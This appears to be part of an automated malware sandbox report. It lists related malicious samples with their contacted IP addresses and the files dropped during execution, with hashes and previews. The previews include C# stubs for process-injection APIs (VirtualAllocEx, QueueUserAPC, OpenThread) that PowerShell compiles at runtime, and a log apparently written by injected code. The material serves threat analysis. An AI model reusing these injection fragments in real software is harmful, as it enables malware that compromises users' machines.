	kgJewvQClx.exe	Get hash	malicious	Browse	87.248.118.22 212.82.100.140
	heUtkmY9lS.dll	Get hash	malicious	Browse	87.248.118.22 212.82.100.140
	dxcbs4GN4T.exe	Get hash	malicious	Browse	87.248.118.22 212.82.100.140
	xQDLIutCAU.exe	Get hash	malicious	Browse	87.248.118.22 212.82.100.140
	HBHNYsrx3p.exe	Get hash	malicious	Browse	87.248.118.22 212.82.100.140
	ftCytTSz94.exe	Get hash	malicious	Browse	87.248.118.22 212.82.100.140
	BRHhSOSJ8B.exe	Get hash	malicious	Browse	87.248.118.22 212.82.100.140
	144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Get hash	malicious	Browse	87.248.118.22 212.82.100.140
	iWLjWhsT55.exe	Get hash	malicious	Browse	87.248.118.22 212.82.100.140
	Payment.html	Get hash	malicious	Browse	87.248.118.22 212.82.100.140
	sample3.exe	Get hash	malicious	Browse	87.248.118.22 212.82.100.140
	8xiF0lExRy.exe	Get hash	malicious	Browse	87.248.118.22 212.82.100.140
	Documento--SII--33875.exe	Get hash	malicious	Browse	87.248.118.22 212.82.100.140
	OnZH4ftMLU.exe	Get hash	malicious	Browse	87.248.118.22 212.82.100.140
	yytr.dll	Get hash	malicious	Browse	87.248.118.22 212.82.100.140
	vG4U0RKFY2.exe	Get hash	malicious	Browse	87.248.118.22 212.82.100.140
37f463bf4616ecd445d4a1937da06e19	FhP4JYCU7J.exe	Get hash	malicious	Browse	89.44.9.140 74.6.143.26 87.248.100.216
	ugeLMlEROB.exe	Get hash	malicious	Browse	89.44.9.140 74.6.143.26 87.248.100.216
	NtqHVU6GDV.dll	Get hash	malicious	Browse	89.44.9.140 74.6.143.26 87.248.100.216
	anIV2qJeLD.exe	Get hash	malicious	Browse	89.44.9.140 74.6.143.26 87.248.100.216
	FhP4JYCU7J.exe	Get hash	malicious	Browse	89.44.9.140 74.6.143.26 87.248.100.216
	NtqHVU6GDV.dll	Get hash	malicious	Browse	89.44.9.140 74.6.143.26 87.248.100.216
	Hfecs.combGNAaGZlY3MuY29t.htm	Get hash	malicious	Browse	89.44.9.140 74.6.143.26 87.248.100.216
	XP-SN-3765518.htm	Get hash	malicious	Browse	89.44.9.140 74.6.143.26 87.248.100.216
	inf.brxd.BXNUYZTCHJ.msi	Get hash	malicious	Browse	89.44.9.140 74.6.143.26 87.248.100.216
	SWIFT-MT-103.docx	Get hash	malicious	Browse	89.44.9.140 74.6.143.26 87.248.100.216
	RFQ.dll	Get hash	malicious	Browse	89.44.9.140 74.6.143.26 87.248.100.216
	NfnCgyhuhS.exe	Get hash	malicious	Browse	89.44.9.140 74.6.143.26 87.248.100.216
	WQRrng5aiw.exe	Get hash	malicious	Browse	89.44.9.140 74.6.143.26 87.248.100.216
	Omegabuilders-FAX84216.html	Get hash	malicious	Browse	89.44.9.140 74.6.143.26 87.248.100.216
	WQRrng5aiw.exe	Get hash	malicious	Browse	89.44.9.140 74.6.143.26 87.248.100.216
	#U266b_789_89676.htm	Get hash	malicious	Browse	89.44.9.140 74.6.143.26 87.248.100.216
	Doc0011222003.exe	Get hash	malicious	Browse	89.44.9.140 74.6.143.26 87.248.100.216
	ATT94606.htm	Get hash	malicious	Browse	89.44.9.140 74.6.143.26 87.248.100.216
	Remittance Advice.html	Get hash	malicious	Browse	89.44.9.140 74.6.143.26 87.248.100.216
	e8rimWGicH.exe	Get hash	malicious	Browse	89.44.9.140 74.6.143.26 87.248.100.216

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	11606
Entropy (8bit):	4.883977562702998
Encrypted:	false
SSDEEP:	192:Axoe5FpOMxoe5Pib4GVsm5emdKVFn3eGOVpN6K3bkkjo5HgkjDt4iWN3yBGHh9sO:6fib4GGVoGIpN6KQkj2Akjh4iUxs14fr
MD5:	1F1446CE05A385817C3EF20CBD8B6E6A
SHA1:	1E4B1EE5EFCA361C9FB5DC286DD7A99DEA31F33D
SHA-256:	2BCEC12B7B67668569124FED0E0CEF2C1505B742F7AE2CF86C8544D07D59F2CE
SHA-512:	252AD962C0E8023419D756A11F0DDF2622F71CBC9DAE31DC14D9C400607DF43030E90BCFBF2EE9B89782CC952E8FB2DADD7BDBBA3D31E33DA5A589A76B87C514
Malicious:	false
Preview:	PSMODULECACHE......P.e...S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........7r8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.9260988789684415
Encrypted:	false
SSDEEP:	3:Nlllulb/lj:NllUb/l
MD5:	13AF6BE1CB30E2FB779EA728EE0A6D67
SHA1:	F33581AC2C60B1F02C978D14DC220DCE57CC9562
SHA-256:	168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
SHA-512:	1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
Malicious:	false
Preview:	@...e................................................@..........

C:\Users\user\AppData\Local\Temp\2227.bi1 Download File
Process:	C:\Windows\System32\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	117
Entropy (8bit):	4.51228797597229
Encrypted:	false
SSDEEP:	3:cPaRhARtt7TSjjhThARtnJI1/v:oMWbtChWbng/v
MD5:	A45E1F430E5F27F3800271EA643136A0
SHA1:	26F5310FA0B49B1568413BC590BE8B974EC12987
SHA-256:	E459FD7C19DE215CD06D71D6D4449C402DC4058A3A7FCF752B77C291655CC8F9
SHA-512:	BA6B86ED4B359E4EF3412E00DB274201D93F5B22B91AD02DFE0894D0C2CAD15032F8F92630DD20A4E0C995E9C87E79555FD0F9CD56722220F56A336946F2CEC2
Malicious:	false
Preview:	Server: dns.opendns.com..Address: 208.67.222.222....Name: myip.opendns.com..Address: 84.17.52.63....-------- ..

C:\Users\user\AppData\Local\Temp\4v5gswf4.0.cs Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text
Category:	dropped
Size (bytes):	426
Entropy (8bit):	5.033139906052158
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zuJ3eIVMRSRa+eNMjSSRrtXuSRHq1zyaRMseeBVtEvwy:V/DTLDfuRXl9eg5rtVuzyleBKwy
MD5:	4D67B4EE9B0124EA3067CCCC7F44B80F
SHA1:	2FE1AFC564476F305A0E2D3F57FC067E3C08E594
SHA-256:	5F263A0DD8E22A4DE11BC5870D10AE9B8D6DFD3CF5CBE915ACE34F747E88C225
SHA-512:	6CA77C9F0D56A036715ABD769E54236F66E7F8FE25CA1B3979DA81976E25AE7B655781A4D141B5C87CFBD5195BB2DC71D1B9D15B875C244FE8EEBDA72624E137
Malicious:	false
Preview:	.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class fvjclmvowuq. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint ylhvvsufcha,uint rxyvxpo);.[DllImport("kernel32")].public static extern IntPtr VirtualAllocEx(IntPtr jhx,IntPtr fapfrwulaod,uint ucg,uint nhatlxexrfg,uint mbnnbncpkga);.. }..}.

C:\Users\user\AppData\Local\Temp\4v5gswf4.cmdline Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	351
Entropy (8bit):	5.278318349630682
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23f4zxs7+AEszIWXp+N23fzGAn:p37Lvkmb6KHwWZE8CA
MD5:	BC70783C96A238BA655593E342B9F14F
SHA1:	602976D538640F98BB934A2B550CF0DDAC4F3EE6
SHA-256:	F31431C2E7BE9D780B3900A2CE17023A085F065523BC91FDCAA072FD00ECCFE2
SHA-512:	67D9A608A4757C15C791F0CC670883EE8067ABD2C27592D1AFBE6D1CD989250EF790C1C6147E0CC02428FC9B19B0BA1BFF19353557D81C12E998D12D4A75A1A6
Malicious:	false
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\4v5gswf4.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\4v5gswf4.0.cs"

C:\Users\user\AppData\Local\Temp\4v5gswf4.dll Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3584
Entropy (8bit):	2.661168047511821
Encrypted:	false
SSDEEP:	24:etGSZcM2Wreq8MTBo6EyX4oonTj9dWhdmWdFtkZfUjFKWI+ycuZhNCSQakSNSVPE:6ZeYSMTBdlX4t3DWjwJU5J1ulya32q
MD5:	8387E1189611349B98D2098FEDA7DC3D
SHA1:	7365B4E64653E9724279EEA92583E7BE694146A4
SHA-256:	62E4730FD807446620449BC72646B39A7088698061347635439780BEF69AA8D1
SHA-512:	2AB585C161C0B4F9E2211657D051A44344C4E3C8218F20FE9DD37E5C3B50B254210AC9D39BA25CF02D3F178BFA7C7A024537C4052722B731B3D1141FF1D9F24A
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a...........!.................$... ...@....... ....................................@..................................#..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................$......H.......X ..x.............................................................(....*BSJB............v4.0.30319......l...P...#~......P...#Strings............#US.........#GUID...$...T...#Blob...........G.........%3............................................................7.0...............3.......................#.............. >............ P............ X.....P ......g.........m.....y.................................g.!...g...!.g.&...g.......+.....4.F.....>.......P.......X.....

C:\Users\user\AppData\Local\Temp\4v5gswf4.out Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
Category:	modified
Size (bytes):	848
Entropy (8bit):	5.328401971088736
Encrypted:	false
SSDEEP:	12:xKIR37Lvkmb6KHwWZE8C1KaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:AId3ka6KHxE8oKaM5DqBVKVrdFAMBJTH
MD5:	DE60CB4B973C89DB1CA831AEFC5FE7CF
SHA1:	F074C4EB01E5B627227C597C9D2354EF725EC570
SHA-256:	1B75158B8528BAD371568EE85107A3D36EEA2B51074E82E2CC9A5FDBA924A403
SHA-512:	D33AF0CC88E8351AF4FDC8D022ACB878244B5DCA28B2ADAAB58BD85BF61E4B6C232170DA88EF16515FB8753A8D53816679C8A9603B39C9ACFF6350076A9B99FF
Malicious:	false
Preview:	.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\4v5gswf4.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\4v5gswf4.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\CSCB9A7ABF6D51B4A89B4972FF51D6A5D9.TMP Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.10949149293103
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grykSQak7YnqqNSVPN5Dlq5J:+RI+ycuZhNCSQakSNSVPNnqX
MD5:	863D455CD0D191F459760CC4DCE4E8BB
SHA1:	8229FC84BDD205FC3A9985DB1E70040896EAF3CE
SHA-256:	51F8B62C4B786370CF4E71F5CECD8679E5DA2D13D9C773789FD30076A69AEC79
SHA-512:	8B62D25E18D58816381AFA04BF7F6EAD04E948F8E813AF977FD9A4C38D1243174314D4B35F1B70E5010046E0B7138BF0C968BC6053E08BC94B7CA91452302392
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...4.v.5.g.s.w.f.4...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...4.v.5.g.s.w.f.4...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\CSCDF07F97C5B754580AFABDA449268F624.TMP Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.0738524384874757
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryDak7YnqqvPN5Dlq5J:+RI+ycuZhNhakSvPNnqX
MD5:	C2D866EAB542DC2E96510D2B78B50BA0
SHA1:	11792FA8538C80AE0BDDE578E912F4B510D3929D
SHA-256:	9153ACB652C422ABA36046E6BD63C15ACE04D1D1AB1501AC376F991D833372D1
SHA-512:	9AF4D5FB82FA223EE3F0F4B19D4FD8D51C6FEC901C9E0017EE2ADEFE57E4E5F4B7CAF7D368F1FD86733344CF8851FC73B7DB8F90528B8294D55963F0C35A7B3D
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...i.1.a.a.e.k.l.i...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...i.1.a.a.e.k.l.i...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\RES2A77.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x482, 9 symbols
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	3.9887400565326674
Encrypted:	false
SSDEEP:	24:HfnW9Q3q6hH2hKdNWI+ycuZhNCSQakSNSVPNnq9hgd:P53qeMKd41ulya32q9y
MD5:	ACC30F70E6A583DA1D499AA1E4E7122F
SHA1:	F2709DA4327CAB53FB1AB0DDC8D0A1FE4C1A9CB9
SHA-256:	7EFA06080F2E90DAF6224F2B08434BE97DF0BA4FDB6FAE3D8666D52A89DAABFD
SHA-512:	716635BAAC4E4313A6AEC9F39729C5766E0FE97FEB0A3E1CAB9E8EBE8DABC8D699AF6A7B2F2A0FA4EE29EA24F197057D418BB0E17E135B33FBBF57763457B45D
Malicious:	false
Preview:	L.....a.............debug$S........D...................@..B.rsrc$01........X.......(...........@..@.rsrc$02........P...2...............@..@........J....c:\Users\user\AppData\Local\Temp\CSCB9A7ABF6D51B4A89B4972FF51D6A5D9.TMP..................=E\...Yv...............4.......C:\Users\user\AppData\Local\Temp\RES2A77.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...4.v.5.g.s.w.f.4...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.

C:\Users\user\AppData\Local\Temp\RESDB8.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x482, 9 symbols
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	3.97295814037481
Encrypted:	false
SSDEEP:	24:HqnW9rVfytHCWhKdNwI+ycuZhNhakSvPNnq9hgd:8WVfytbKdm1ulha3tq9y
MD5:	C9912D93B5802D8EADCF8D36D91A5E38
SHA1:	484FFFD89A10CB8DF08B97C54F4F1D28D5C79E9D
SHA-256:	5408AD27D80D801335AAA0E0477F42342DEB6264A5DB772C5F99253A3F37BE28
SHA-512:	B0519A087CE5E06BE3D3F950D14D3D02866E5850BC6160EC7CD79C56CD95BE6216524D9EBCC611DB404C413C1F617431BF3866F73C5BADDED1E350B226B2E15F
Malicious:	false
Preview:	L.....a.............debug$S........D...................@..B.rsrc$01........X.......(...........@..@.rsrc$02........P...2...............@..@........K....c:\Users\user\AppData\Local\Temp\CSCDF07F97C5B754580AFABDA449268F624.TMP..................f.B...Q.+x.............3.......C:\Users\user\AppData\Local\Temp\RESDB8.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...i.1.a.a.e.k.l.i...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0mmq3jzl.ebk.psm1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y3sr4b0q.5pk.ps1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\i1aaekli.0.cs Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text
Category:	dropped
Size (bytes):	414
Entropy (8bit):	5.012387590489786
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zuJc0H/VMRSR7a1gPc9OopxkSRa+rVSSRnA/fFOlN218zPQy:V/DTLDfuPH/ly/xv9rV5nA/NwSQQy
MD5:	E458C9B10EE5485711E8601EC2A9F7E7
SHA1:	52EBD94DA80BD5538C113C1A73BA0F773B3207F4
SHA-256:	10D6C8D84A31080F063B2FF734D3EC20DA046B698298723676C722C80D932683
SHA-512:	98F83BF02C6E41CDB284BC764B9F31231BA7936A086679333D8AA8A459448BCAE8A77765E3709EBB493FF274BF55F01282FB0EDA20391FC943E4BC0F184CF0E9
Malicious:	false
Preview:	.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class cnjja. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr ljgjre,IntPtr eayjlqvhl,IntPtr sykorjnxna);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint hrlef,uint rrugydrmoih,IntPtr lsfhdtddyu);.. }..}.

C:\Users\user\AppData\Local\Temp\i1aaekli.cmdline Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	351
Entropy (8bit):	5.230045602824142
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fxEp7LGzxs7+AEszIWXp+N23fxEpD:p37Lvkmb6KH5EpOWZE85EpDn
MD5:	AEDA637F0B93910DDA9DCB41585D1FBF
SHA1:	7D528268F83393309FBB4DCB105B11C7EBD1826D
SHA-256:	20B32FC56CB870C6CDCBF8D753CB42C34D07801D392189238740EA42FC9A17A3
SHA-512:	22F717BF7766EB7E3986521BBBB63CAD78047D56AF9D5AC7148418B78F37E4E1E2ED70BBEBF121730D251C47E24B8A2D06CB7C5C9F2456B687E0CEE768936B9E
Malicious:	true
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\i1aaekli.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\i1aaekli.0.cs"

C:\Users\user\AppData\Local\Temp\i1aaekli.dll Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3584
Entropy (8bit):	2.6242156235464043
Encrypted:	false
SSDEEP:	24:etGS68+mUE7R85lwCk3tQJ3pPo3864OFtkZfpuDZ0WI+ycuZhNhakSvPNnq:60XE7S5lwhe8jwJpYZX1ulha3tq
MD5:	FF28D58E52C9B08A0B91C34FE6CB8086
SHA1:	EC7E91AEB56249664477F8A1A88261329C987F57
SHA-256:	40D2156C7127E729396659AB33BF3F105EFD7BEF135E9C680E4FBF79AE427E23
SHA-512:	BDBEF6188AB09F806D0C41DC578AC17D5531015C757D5E4752CDA2F3C771B04FE8D7B9E9C2DC8FC84EB31201832C6B8CAAF6938451F84FBBB551BAE59EFEC24C
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a...........!.................$... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..d.............................................................(....BSJB............v4.0.30319......l...H...#~......D...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................1................(...................................... 8............ E............ X.....P ......c.........i.....p.....z.....................c. ...c...!.c.%...c.......*.....3.;.....8.......E.......X...........

C:\Users\user\AppData\Local\Temp\i1aaekli.out Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
Category:	modified
Size (bytes):	848
Entropy (8bit):	5.3131522141031855
Encrypted:	false
SSDEEP:	24:AId3ka6KH4PE84iKaM5DqBVKVrdFAMBJTH:Akka6AIE8HKxDcVKdBJj
MD5:	0E1AD61E45113253E5CFE1E18A0F35EC
SHA1:	FC96533B42CBEE7B23340B5CB6C45CA6EB3AA576
SHA-256:	1230246ED71C46FE8AEADE013E8D857EBD022689CA611DDFC7EE5847868F1981
SHA-512:	0BC9F6E5317EAEB26EC7F1F37CF82552F6C78FE40F2D1622E6AA0215D24E2657A63D9D4EC8C956E3F3F59905C44B11A2D3BB4FB9434B2BAEC0BC207F87D5811C
Malicious:	false
Preview:	.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\i1aaekli.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\i1aaekli.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Roaming\Microsoft\MarkClass Download File
Process:	C:\Windows\explorer.exe
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	10859
Entropy (8bit):	4.446683388718207
Encrypted:	false
SSDEEP:	96:FYnnnAJppp222222MXXC3ZlMB4+j+PDdEyRPdrkUUxeXAyNY90ZDCmmmm88888Yh:9FlQyNQ0Z6wwwwOOOO5
MD5:	ED7ED76ADB16092B594B8CF3433DA64C
SHA1:	BD28A1BBAB4EDB61E3E6E6C1A7AF25C0511DFC9A
SHA-256:	89113B138596A9A8DDF4DCF524FC60FC1D0855E67B3859FECBA1360F42190EBD
SHA-512:	759673DAF16A071F025179FC4A67CED8DE93E1E0B0842A3E73E0FBE33A146DBBF61E8194AA0E1F91968FB2478CE5F654EF4C9D513B98B23E8BE1E726F6E56964
Malicious:	false
Preview:	23-11-2021 21:01:39 \| "<!DOCTYPE HTML>" \| 1..23-11-2021 21:01:39 \| "<HTML ID" \| 1..23-11-2021 21:01:39 \| "<HEAD>" \| 1..23-11-2021 21:01:40 \| "<META CHARSET" \| 1..23-11-2021 21:01:40 \| "<META NAME" \| 1..23-11-2021 21:01:40 \| "<META NAME" \| 1..23-11-2021 21:01:40 \| "<META NAME" \| 1..23-11-2021 21:01:42 \| "<TITLE>YAHOO</TITLE>" \| 1..23-11-2021 21:01:42 \| "<META NAME" \| 1..23-11-2021 21:01:43 \| "<LINK REL" \| 1..23-11-2021 21:01:43 \| "<LINK REL" \| 1..23-11-2021 21:01:43 \| "<LINK REL" \| 1..23-11-2021 21:01:44 \| "<LINK REL" \| 1..23-11-2021 21:01:44 \| "<LINK REL" \| 1..23-11-2021 21:01:44 \| "<LINK REL" \| 1..23-11-2021 21:01:44 \| "<LINK REL" \| 1..23-11-2021 21:01:44 \| "<LINK REL" \| 1..23-11-2021 21:01:44 \| "<LINK REL" \| 1..23-11-2021 21:01:45 \| "<META NAME" \| 1..23-11-2021 21:01:45 \| "<LINK REL" \| 1..23-11-2021 21:01:45 \| "<LINK REL" \| 1..23-11-2021 21:01:45 \| 